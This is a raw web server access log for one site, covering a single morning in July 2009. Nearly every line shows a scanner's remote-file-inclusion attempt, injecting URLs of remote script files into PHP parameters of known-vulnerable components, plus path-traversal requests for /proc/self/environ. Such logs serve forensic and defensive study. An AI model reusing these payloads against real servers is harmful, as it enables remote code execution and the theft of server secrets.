204.9.247.53 - - [05/Jul/2009:05:46:44 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:46:44 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 200 4949 "-" "libwww-perl/5.805" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:05:48:03 -0700] "GET /logs/access_090519.log//index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
218.158.98.196 - - [05/Jul/2009:05:48:05 -0700] "GET /index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 200 6125 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:48:33 -0700] "GET /logs/access_090517.log//components/com_flyspray/startdown.php?file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:48:33 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:48:33 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:48:33 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:05:48:37 -0700] "GET /logs/access_090519.log//index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:05:48:38 -0700] "GET /index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.0" 200 6109 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:49:13 -0700] "GET /logs/access_090517.log/appserv/main.php?appserv_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:49:13 -0700] "GET /appserv/main.php?appserv_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:49:13 -0700] "GET /logs/appserv/main.php?appserv_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:05:50:27 -0700] "GET /logs/access_090519.log//index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:05:50:27 -0700] "GET /index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 200 6125 "-" "libwww-perl/5.79" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:05:50:28 -0700] "GET /logs//index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:50:29 -0700] "GET /logs/access_090526.log/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:05:50:38 -0700] "GET /logs/access_090612.log/index.php?inhalt=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:51:20 -0700] "GET /logs/access_090610.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:51:20 -0700] "GET /logs/access_090610.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
204.9.247.53 - - [05/Jul/2009:05:51:20 -0700] "GET /logs/access_090610.log////?_SERVER[DOCUMENT_ROOT]=http://www.dapr.gov.ma/saupap/langue/idd.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.38.29.124 - - [05/Jul/2009:05:51:41 -0700] "GET /logs/access_090605.log%20%20///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://loveletter24.com/mp3/fid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.124 - - [05/Jul/2009:05:51:41 -0700] "GET /logs/access_090623.log%20%20///technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://loveletter24.com/mp3/fid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:52:18 -0700] "GET /logs/access_090617.log%20%20//components/com_flyspray/startdown.php?file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:05:52:18 -0700] "GET /logs/access_090517.log%20%20//components/com_flyspray/startdown.php?file=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:52:29 -0700] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:52:32 -0700] "GET /logs/access_090515.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:52:34 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:05:52:39 -0700] "GET /logs/access_090603.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:52:45 -0700] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:52:45 -0700] "GET /logs/access_090615.log//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:52:45 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:52:59 -0700] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:05:53:04 -0700] "GET /logs/access_090606.log//index.php?strona=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:53:06 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:53:07 -0700] "GET /logs/access_090615.log//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.18.161.226 - - [05/Jul/2009:05:53:16 -0700] "GET /logs/access_090602.log/appserv/main.php?appserv_root=http://aman.or.id/includes/phpmailer/id.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:54:16 -0700] "GET /logs/access_090604.log//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:58:31 -0700] "GET /logs/access_090615.log%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:05:58:55 -0700] "GET /logs/access_090604.log%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:51 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:51 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:51 -0700] "GET /logs/access_090530.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:52 -0700] "GET /logs/access_090530.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:52 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:52 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:54 -0700] "GET /logs/access_090530.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:54 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:55 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:55 -0700] "GET /logs/access_090530.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:05:59:55 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:00:59 -0700] "GET /logs/access_090522.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:00:59 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:00:59 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:01:14 -0700] "GET /logs/access_090517.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:06:01:26 -0700] "GET /logs/access_090615.log%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:06:01:43 -0700] "GET /logs/access_090604.log%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:06:02:29 -0700] "GET /logs/access_090519.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:06:02:32 -0700] "GET /logs/access_090519.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:06:02:34 -0700] "GET /logs/access_090519.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
67.161.198.16 - - [05/Jul/2009:06:02:36 -0700] "GET /logs/access_090519.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "XXXXXX" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:02:48 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:02:48 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:02:48 -0700] "GET /logs/access_090530.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:02:58 -0700] "GET /logs/access_090519.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:04:31 -0700] "GET /logs/access_090530.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:04:35 -0700] "GET /logs/access_090519.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.7.68 - - [05/Jul/2009:06:06:23 -0700] "GET /orange_g/forum/viewtopic.php?p=26199 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:35 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:36 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:36 -0700] "GET /logs/access_090524.log//squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:41 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:41 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:41 -0700] "GET /logs/access_090524.log//squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:42 -0700] "GET /logs/access_090510.log//squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.100.186.87 - - [05/Jul/2009:06:06:45 -0700] "GET /logs/access_090510.log//squirrelcart/cart_content.php?cart_isp_root=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:07:04 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:07:04 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:07:05 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:06:08:01 -0700] "GET /logs/access_090610.log///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:06:08:01 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
218.150.78.235 - - [05/Jul/2009:06:08:02 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:30 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:30 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:06:10:32 -0700] "GET /logs/access_090523.log//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:06:10:32 -0700] "GET /index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:06:10:32 -0700] "GET /logs//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:33 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:33 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:33 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:34 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
62.58.32.74 - - [05/Jul/2009:06:10:44 -0700] "GET /logs/access_090511.log//index2.php?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.229.45.106 - - [05/Jul/2009:06:10:50 -0700] "GET /logs/access_090522.log%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.d-sport.ru//assets/cache/idv6.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:53 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:58 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:58 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:10:58 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:12:41 -0700] "GET /logs/access_090624.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:12:58 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:12:58 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.0" 200 4790 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:12:59 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:13:18 -0700] "GET /logs/access_090620.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:13:18 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
83.98.209.71 - - [05/Jul/2009:06:13:18 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.vereinte-nationen.de/kw_joomla//administrator/components/com_moofaq/css/_a?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:13:19 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:20 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:20 -0700] "GET /logs/access_090617.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:20 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:06:13:20 -0700] "GET /logs/access_090602.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:13:23 -0700] "GET /logs/access_090617.log//components/com_flyspray/startdown.php?file=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.246.20.221 - - [05/Jul/2009:06:13:23 -0700] "GET /components/com_flyspray/startdown.php?file=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
